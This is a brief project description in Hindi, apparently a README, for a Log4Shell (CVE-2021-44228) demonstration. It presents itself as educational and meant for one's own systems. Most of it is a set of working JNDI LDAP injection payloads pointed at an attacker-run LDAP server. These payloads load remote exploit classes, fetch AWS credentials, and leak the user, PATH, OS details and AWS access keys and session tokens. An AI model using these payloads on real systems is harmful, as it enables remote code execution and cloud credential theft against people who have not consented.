
शैक्षिक प्रदर्शन Log4Shell भेद्यता (CVE-2021-44228) का, JNDI LDAP पेलोड के साथ, आपके अपने सिस्टम पर प्रयोगात्मक परीक्षण के लिए।
यह प्रोजेक्ट log4shell सुरक्षा भेद्यता के कार्य करने के तरीके का एक प्रदर्शन है।
यह भेद्यता CVE-2021-44228 में वर्णित है।
यह प्रोजेक्ट केवल शैक्षिक उपयोग के लिए है। इसका उपयोग केवल आपके अपने सिस्टम पर और केवल प्रयोगात्मक उद्देश्य के लिए किया जाना चाहिए।
कोई भी निष्पादन आपके अपने जोखिम पर किया जाता है। लेखक प्रोजेक्ट के निष्पादन के परिणामस्वरूप होने वाली किसी भी घटना के लिए कोई जिम्मेदारी नहीं लेता है।
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'